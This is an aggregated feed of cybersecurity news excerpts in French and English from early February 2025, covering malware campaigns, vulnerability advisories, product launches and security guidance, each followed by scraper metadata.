CyberArk and SentinelOne team up to enable step change in endpoint and identity security Mutual customers will benefit from boosted endpoint threat detection and response capabilities - Product Reviews]]> 2025-02-06T21:55:03+00:00 https://www.globalsecuritymag.fr/cyberark-announced-a-new-integration-with-sentinelone-singularity.html www.secnews.physaphae.fr/article.php?IdArticle=8647299 False Threat None 3.0000000000000000 Global Security Mag - Site de news francais Les menaces de cybersécurité augmentent, mais ce sont les générations Z et Alpha qui introduisent des risques, et non les " personnes âgées " Points de Vue

Par Anna Collard, vice-présidente principale de la stratégie de contenu et évangéliste chez KnowBe4 Africa Les menaces de cybersécurité augmentent, mais ce sont les générations Z et Alpha qui introduisent des risques, et non les " personnes âgées " (Par Anna Collard) Génération Z sont beaucoup plus susceptibles que les employés plus âgés d\'utiliser le même mot de passe pour leurs comptes professionnels et personnels et d\'ignorer les mises à jour informatiques importantes - Points de Vue]]> 2025-02-06T21:43:00+00:00 https://www.globalsecuritymag.fr/les-menaces-de-cybersecurite-augmentent-mais-ce-sont-les-generations-z-et-alpha.html www.secnews.physaphae.fr/article.php?IdArticle=8647302 False Threat None 3.0000000000000000 Global Security Mag - Site de news francais Quest lance deux solutions : Security Guardian Shields Up et Disaster Recovery for Identity Produits

Quest Mène la Charge avec des Avancées Inédites en Sécurité d\'Identité et Récupération après Ransomware Redéfinition des standards ITDR et de cyber-résilience en perturbant les menaces émergentes et en contrant les attaques via la Quest Unified Cloud Platform - Produits]]> 2025-02-06T21:36:12+00:00 https://www.globalsecuritymag.fr/quest-lance-deux-solutions-inedites-sur-le-marche-security-guardian-shields-up.html www.secnews.physaphae.fr/article.php?IdArticle=8647304 False Threat,Cloud None 3.0000000000000000 Global Security Mag - Site de news francais Checkmarx Launches Collaborative Checkmarx Zero Research Hub Product Reviews

Checkmarx Launches Collaborative Checkmarx Zero Research Hub to Share Application Security and Software Supply Chain Threat Intelligence Security researchers and AppSec leaders are invited to explore research and contribute to vulnerability database - Product Reviews]]> 2025-02-06T21:33:26+00:00 https://www.globalsecuritymag.fr/checkmarx-launches-collaborative-checkmarx-zero-research-hub.html www.secnews.physaphae.fr/article.php?IdArticle=8647305 False Vulnerability,Threat None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Fake Google Chrome Sites Distribute ValleyRAT Malware via DLL Hijacking Bogus websites advertising Google Chrome have been used to distribute malicious installers for a remote access trojan called ValleyRAT. The malware, first detected in 2023, is attributed to a threat actor tracked as Silver Fox, with prior attack campaigns primarily targeting Chinese-speaking regions like Hong Kong, Taiwan, and Mainland China. "This actor has increasingly targeted key roles]]> 2025-02-06T20:04:00+00:00 https://thehackernews.com/2025/02/fake-google-chrome-sites-distribute.html www.secnews.physaphae.fr/article.php?IdArticle=8647236 False Malware,Threat None 3.0000000000000000 Techworm - News OpenAI Data Breach: Threat Actor Allegedly Claims 20 Million Logins for Sale An anonymous threat actor has allegedly claimed responsibility for a massive data breach affecting OpenAI, offering for sale a database containing the login credentials of 20 million users on the dark web. The unverified claim that surfaced on an underground hacking forum has raised concerns about data security for millions of users relying on OpenAI’s services. The threat actor alleges they have access to a trove of login credentials, including emails and hashed passwords, purportedly sourced from OpenAI\'s user accounts. To promote their discovery, they shared a post with a sample of the data and more being offered for a few dollars. ”When I realized that OpenAI might have to verify accounts in bulk, I understood that my password wouldn\'t stay hidden. I have more than 20 million access codes to OpenAI accounts. If you want, you can contact me – this is a treasure, and Jesus thinks so too,” reads the post by the threat actor on the hacker forum, which was shared by HackManac. OpenAI and independent cybersecurity firms have neither officially confirmed nor denied the threat actor\'s claims. If proven true, this breach would be one of the largest data leaks related to OpenAI and could also lead to phishing attacks, unauthorized access, and identity theft. While the authenticity of the breach remains unconfirmed, OpenAI users should remain vigilant and prioritize digital security measures. They are advised to take precautionary measures such as updating OpenAI passwords and avoiding using the same password across multiple sites, enabling two-factor authentication (2FA), and monitoring accounts linked to OpenAI for unusual login attempts or password reset requests. Whether this is a legitimate breach or an elaborate hoax, the incident serves as a stark reminder of the persistent threats in the digital realm. This is a developing story; updates will follow as new information emerges. ]]> 2025-02-06T19:41:51+00:00 https://www.techworm.net/2025/02/openai-data-breach-20-million-logins-sale.html www.secnews.physaphae.fr/article.php?IdArticle=8647221 False Data Breach,Threat None 3.0000000000000000 Netskope - etskope est une société de logiciels américaine fournissant une plate-forme de sécurité informatique Secure Third-party Access Without the Hassle of VPNs Today\'s businesses rely on third-party vendors, contractors, and partners to operate efficiently more than ever. But every external connection introduces a risk-especially when it comes with overly permissive access. If not properly managed, this can become a significant vulnerability. Attackers know this, and they actively exploit these weak points. Take the recent Belsen Group breach […]

>Today\'s businesses rely on third-party vendors, contractors, and partners to operate efficiently more than ever. But every external connection introduces a risk-especially when it comes with overly permissive access. If not properly managed, this can become a significant vulnerability. Attackers know this, and they actively exploit these weak points. Take the recent Belsen Group breach […] ]]> 2025-02-06T18:44:12+00:00 https://www.netskope.com/blog/secure-third-party-access-without-the-hassle-of-vpns www.secnews.physaphae.fr/article.php?IdArticle=8647269 False Vulnerability,Threat None 2.0000000000000000 SecurityWeek - Security News 1,000 Apps Used in Malicious Campaign Targeting Android Users in India Zimperium warns that threat actors have stolen the information of tens of thousands of Android users in India using over 1,000 malicious applications.

>Zimperium warns that threat actors have stolen the information of tens of thousands of Android users in India using over 1,000 malicious applications. ]]> 2025-02-06T18:19:36+00:00 https://www.securityweek.com/1000-apps-used-in-malicious-campaign-targeting-android-users-in-india/ www.secnews.physaphae.fr/article.php?IdArticle=8647272 False Threat,Mobile None 2.0000000000000000 Mandiant - Blog Sécu de Mandiant Using capa Rules for Android Malware Detection capa to analyze native ARM ELF files targeting Android. Together, we improved existing and developed new capa rules to detect capabilities observed in Android malware, used the capa rule matches to highlight the highly suspicious code in native files, and prompted Gemini with the highlighted code behaviors for summarization to enhance our review processes for faster decisions. In this blog post, we will describe how we leverage capa behavior-detection capabilities and state-of-art Gemini summarization by: Showcasing a malware sample that used various anti-analysis tricks to evade detections Explaining how our existing and new capa rules identify and highlighted those behaviors Presenting how Gemini summarizes the highlighted code for security reviews An Illegal Gambling App Under a Music App Façade Google Play Store ensures all published apps conform to local laws and regulations. This includes gambling apps, which are prohibited or require licenses in some areas. Developing and distributing illegal gambling apps in such areas can generate significant illicit profits, which sometimes is associated with organized crimes. To bypass Google Play Store\'s security-screening procedures, some gambling apps disguise themselves with harmless façades like music or casual games. These apps only reveal their gambling portals]]> 2025-02-06T14:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/capa-rules-android-malware-detection/ www.secnews.physaphae.fr/article.php?IdArticle=8647244 False Malware,Tool,Threat,Mobile,Medical,Cloud None 3.0000000000000000 HackRead - Chercher Cyber Ukraine\\'s largest bank PrivatBank Targeted with SmokeLoader malware UAC-0006, a financially motivated threat actor, targets PrivatBank customers with advanced phishing attacks. CloudSEK’s research reveals malicious emails…]]> 2025-02-06T13:14:40+00:00 https://hackread.com/ukraine-largest-bank-privatbank-smokeloader-malware/ www.secnews.physaphae.fr/article.php?IdArticle=8647214 False Malware,Threat None 3.0000000000000000 Bleeping Computer - Magazine Américain Hackers exploit SimpleHelp RMM flaws to deploy Sliver malware Hackers are targeting vulnerable SimpleHelp RMM clients to create administrator accounts, drop backdoors, and potentially lay the groundwork for ransomware attacks. [...]]]> 2025-02-06T12:50:54+00:00 https://www.bleepingcomputer.com/news/security/hackers-exploit-simplehelp-rmm-flaws-to-deploy-sliver-malware/ www.secnews.physaphae.fr/article.php?IdArticle=8647262 False Ransomware,Malware,Threat None 2.0000000000000000 Cyble - CyberSecurity Firm CISA Issues Nine Critical Industrial Control Systems Advisories, Addressing Vulnerabilities in Key Equipment Overview The Cybersecurity and Infrastructure Security Agency (CISA) released a series of nine Industrial Control Systems (ICS) advisories on February 4, 2025. These CISA ICS advisories provide essential information about vulnerabilities, security risks, and recommended mitigations affecting various industrial control systems and their components. The advisories, which highlight numerous threats across a variety of devices, emphasize the need for vigilance and prompt action to protect critical infrastructure from potential exploits. The nine advisories address flaws found in systems from notable vendors such as Schneider Electric, Rockwell Automation, and AutomationDirect. These vulnerabilities can allow attackers to disrupt operations, gain unauthorized access, or even execute remote code on compromised devices. Details of the Industrial Control Systems Advisories 1. Western Telematic Inc. Vulnerability Advisory Code: ICSA-25-035-01 Vulnerable Products: NPS Seri]]> 2025-02-06T11:44:16+00:00 https://cyble.com/blog/cisa-new-industrial-control-systems-advisories/ www.secnews.physaphae.fr/article.php?IdArticle=8647196 False Vulnerability,Threat,Legislation,Industrial None 3.0000000000000000 Cyble - CyberSecurity Firm Five Eyes Cyber Agencies Share New Security Guidelines for Edge Device Manufacturers Overview The rise in cyber threats targeting edge devices has prompted the cybersecurity agencies of the UK, Australia, Canada, New Zealand, and the United States to release new guidelines aimed at strengthening the security of these critical network components. These recommendations urge manufacturers to integrate robust forensic and logging features by default, making it easier to detect and investigate cyber intrusions. As cybercriminals and state-sponsored actors continue to exploit vulnerabilities in edge devices, organizations must adopt these security measures to mitigate risks. “In the face of a relentless wave of intrusions involving network devices globally our new guidance sets what we collectively see as the standard required to meet the contemporary threat,” said NCSC Technical Director Ollie Whitehouse. “In doing so we are giving manufacturers and their customers the tools to ensure products not only defend against cyberattacks but also provide investigative capabilities require post intrusion.” Understanding Edge Device Security Risks Edge devices, including routers, IoT sensors, security cameras, and smart appliances, act as critical gateways between local networks and the internet. These devices are often deployed with minimal security features, making them attractive targets for attackers who exploit vulnerabilities to gain unauthorized access, disrupt services, or maintai]]> 2025-02-06T10:44:52+00:00 https://cyble.com/blog/new-security-guidelines-edge-device-manufacturers/ www.secnews.physaphae.fr/article.php?IdArticle=8647186 False Tool,Vulnerability,Threat,Technical None 3.0000000000000000 AlienVault Lab Blog - AlienVault est un acteur de defense majeur dans les IOC LevelBlue Expands Its Partner Program Globally announced four security services to our partners that easily extend and integrate with LevelBlue USM Anywhere, which includes proactive threat intelligence: LevelBlue Managed Threat Detection and Response; LevelBlue Incident Response Retainer; LevelB]]> 2025-02-06T07:00:00+00:00 https://levelblue.com/blogs/security-essentials/levelblue-expands-its-partner-program-globally www.secnews.physaphae.fr/article.php?IdArticle=8647230 False Vulnerability,Threat,Technical None 3.0000000000000000 InformationSecurityBuzzNews - Site de News Securite Credential-stealing malware surges in 2024 Malware designed to steal credentials from password stores now accounts for 25% of all malware activity-a dramatic threefold increase in this type of threat. This was one of the findings of Picus Security\'s annual cybersecurity analysis, The Red Report 2025. This is the first time that credentials theft has ranked among the top 10 techniques [...]]]> 2025-02-06T04:53:11+00:00 https://informationsecuritybuzz.com/credential-stealing-malware-surges-in/ www.secnews.physaphae.fr/article.php?IdArticle=8647149 False Malware,Threat None 3.0000000000000000 Techworm - News NETGEAR Urges Users to Fix Critical Wi-Fi Router Flaws PSV-2023-0039 and PSV-2021-0117, affect multiple Wi-Fi 6 access points (WAX206, WAX214v2, and WAX220) and Nighthawk Pro Gaming router models (XR1000, XR1000v2, XR500). While the PSV-2023-0039 (CVSS score: 9.8) vulnerability could enable unauthenticated threat actors to exploit the flaw for remote code execution (RCE), the PSV-2021-0117 (CVSS score: 9.6) vulnerability could be exploited for authentication bypass in low-complexity attacks without user interaction. The following product models are affected by the unauthenticated RCE security vulnerability PSV-2023-0039, that were patched in the versions given below: XR1000 – fixed in firmware version 1.0.0.74 XR1000v2 – fixed in firmware version 1.1.0.22 XR500 – fixed in firmware version 2.3.2.134 “NETGEAR strongly recommends that you download the latest firmware as soon as possible,” reads the advisory published on Saturday. Further, the following product models are impacted by the authentication bypass security vulnerability PSV-2021-0117, which was patched in the versions shown below: WAX206 – fixed in firmware version 1.0.5.3 WAX220 – fixed in firmware version 1.0.3.5 WAX214v2 – in firmware version 1.0.2.5 You can follow the steps mentioned below to download and install the latest firmware for your NETGEAR product: Visit the NETGEAR Support Please enter your model number in the search box, then select your model from the drop-down menu as soon as it appears. If a drop-down menu does not appear, check that you have entered your model number correctly or select a product category to find your product model. Click Downloads. Under Current Versions, choose the download whose title begins with Firmware Version. Click Download. Follow the instructions provided in your product\'s user manual, firmware release notes, or product support page. “The unauthenticated RCE vulnerability remains if you do not complete all recommended steps,” the company warned on Saturday. “NETGEAR is n]]> 2025-02-05T20:44:01+00:00 https://www.techworm.net/2025/02/netgear-user-fix-critical-wi-fi-router-flaws.html www.secnews.physaphae.fr/article.php?IdArticle=8647058 False Vulnerability,Threat None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Silent Lynx Using PowerShell, Golang, and C++ Loaders in Multi-Stage Cyberattacks A previously undocumented threat actor known as Silent Lynx has been linked to cyber attacks targeting various entities in Kyrgyzstan and Turkmenistan. "This threat group has previously targeted entities around Eastern Europe and Central Asian government think tanks involved in economic decision making and banking sector," Seqrite Labs researcher Subhajeet Singha said in a technical report]]> 2025-02-05T18:16:00+00:00 https://thehackernews.com/2025/02/silent-lynx-using-powershell-golang-and.html www.secnews.physaphae.fr/article.php?IdArticle=8647041 False Threat,Technical None 3.0000000000000000 UnderNews - Site de news "pirate" francais Formation cyber : Google.org investit 15 millions de dollars en France, en Europe, au Moyen-Orient et en Afrique Alors que les cyberattaques se multiplient et que les menaces ne cessent de croître, l’Europe est confrontée à une pénurie de talents, plus de 800 000 postes en cybersécurité restant à pourvoir. 15 000 uniquement pour la France en 2024 selon la DGSE*. Il est donc indispensable de contribuer à la formation d’une main-d’œuvre qualifiée. Communiqué – […] The post Formation cyber : Google.org investit 15 millions de dollars en France, en Europe, au Moyen-Orient et en Afrique first appeared on UnderNews.

>Alors que les cyberattaques se multiplient et que les menaces ne cessent de croître, l’Europe est confrontée à une pénurie de talents, plus de 800 000 postes en cybersécurité restant à pourvoir. 15 000 uniquement pour la France en 2024 selon la DGSE*. Il est donc indispensable de contribuer à la formation d’une main-d’œuvre qualifiée. Communiqué – […] The post Formation cyber : Google.org investit 15 millions de dollars en France, en Europe, au Moyen-Orient et en Afrique first appeared on UnderNews.]]> 2025-02-05T14:52:49+00:00 https://www.undernews.fr/reseau-securite/formation-cyber-google-org-investit-15-millions-de-dollars-en-france-en-europe-au-moyen-orient-et-en-afrique.html www.secnews.physaphae.fr/article.php?IdArticle=8647067 False Threat None 3.0000000000000000 Cyble - CyberSecurity Firm CISA Adds New Vulnerabilities to Known Exploited Vulnerabilities Catalog – Critical Updates Required Overview The Cybersecurity and Infrastructure Security Agency (CISA) has recently added four vulnerabilities to its Known Exploited Vulnerabilities Catalog. These vulnerabilities, identified in widely-used software products, have been actively exploited by cyber attackers. With these updates, CISA highlights the importance of addressing these flaws promptly to mitigate the risks they pose, particularly to federal enterprises and other critical infrastructure sectors. The newly added vulnerabilities include CVE-2024-45195, CVE-2024-29059, CVE-2018-9276, and CVE-2018-19410, all of which could have severe consequences for the security of affected systems. Detailed List of Vulnerabilities Highlighed in the Known Exploited Vulnerabilities Catalog CVE-2024-45195: Apache OFBiz Forced Browsing Vulnerability The first of the vulnerabilities, CVE-2024-45195, relates to a flaw in Apache OFBiz, an open-source enterprise resource planning (ERP) and e-commerce solution. This vulnerability is a forced browsing issue, where attackers can gain unauthorized access to certain parts of a website by bypassing security restrictions through direct URL requests. The flaw was discovered in Apache OFBiz versions before 18.12.16, and users are advised to upgrade to this version or later to mitigate the threat. The vulnerability can allow attackers to gain unauthorized access to sensitive data by leveraging weak authorization mechanisms. It is listed in the CISA Known Exploited Vulnerabilities Catalog due to active exploitation, with evidence showing malicious actors targeting vulnerable systems to escalate privileges. CVE-2024-29059: Microsoft .NET Framework Info]]> 2025-02-05T12:25:39+00:00 https://cyble.com/blog/new-flaws-added-to-known-exploited-vulnerabilities-catalog/ www.secnews.physaphae.fr/article.php?IdArticle=8647026 False Tool,Vulnerability,Threat,Patching None 3.0000000000000000 Sygnia - CyberSecurity Firm The Critical Importance of a Robust Incident Response Plan In today\'s challenging cyber threat landscape, having an effective Incident Response (IR) plan is essential. Discover how preparation and decisive action can help organizations minimize risks, maintain business continuity, and build resilience.

>In today\'s challenging cyber threat landscape, having an effective Incident Response (IR) plan is essential. Discover how preparation and decisive action can help organizations minimize risks, maintain business continuity, and build resilience. ]]> 2025-02-05T12:19:51+00:00 https://www.sygnia.co/blog/critical-importance-incident-response-plan/ www.secnews.physaphae.fr/article.php?IdArticle=8647019 False Threat None 3.0000000000000000 Cyble - CyberSecurity Firm Stealthy Attack: Dual Injection Undermines Chrome\\'s App-Bound Encryption Key Takeaways Cyble Research and Intelligence Labs (CRIL) identified malware being spread via a ZIP file containing an .LNK file disguised as a PDF and an XML project file masquerading as a PNG to trick users into opening it. The filename suggests that the malware is likely targeting organizations in Vietnam, particularly in the Telemarketing or Sales sectors. The LNK file creates a scheduled task that runs every 15 minutes, executing MSBuild.exe to deploy malicious C# code. The malware is capable of bypassing Chrome\'s App-Bound Encryption and deploying a stealer payload to target sensitive Chrome-related files. Additionally, it uses the Double Injection technique to carry out fileless execution to evade detection. The malware establishes a connection to the Threat Actor (TA) through the Telegram Web API for command execution. The malware enables the TA to change the Telegram bot ID and chat ID as required, offering flexibility in controlling their communication channels. Overview Cyble Research & Intelligence Labs (CRIL) discovered malware potentially targeting organizations in Vietnam, especially those in the Telemarketing or Sales sectors. The initial infection vector is unknown at present. This malware was discovered being delivered via a malicious ZIP archive containing an .LNK file disguised as a .PDF and an XML project file masquerading as a .PNG file, designed to deceive users into opening the fake PDF file. When executed, the shortcut file copies an XML project file to the Temp directory and initiates a command that creates a scheduled task running every 15 minutes. This task launches ]]> 2025-02-05T09:40:09+00:00 https://cyble.com/blog/dual-injection-undermines-chromes-encryption/ www.secnews.physaphae.fr/article.php?IdArticle=8646983 False Malware,Tool,Vulnerability,Threat None 3.0000000000000000 The State of Security - Magazine Américain Zero Trust Principles for Critical Infrastructure Security The cyber threat to critical infrastructure has never been greater. The growing sophistication of cybercriminals, deteriorating geopolitical relations, and the convergence of operational technology (OT) and information technology (IT) have created unprecedented risks for critical infrastructure organizations. Fortunately, resources are available to help these organizations protect themselves. In late October 2024, the Cloud Security Alliance (CSA) released Zero Trust Guidance for Critical Infrastructure, a systematic, five-step roadmap to help the world\'s most important organizations...]]> 2025-02-05T05:30:12+00:00 https://www.tripwire.com/state-of-security/zero-trust-principles-critical-infrastructure-security www.secnews.physaphae.fr/article.php?IdArticle=8647007 False Threat,Cloud None 3.0000000000000000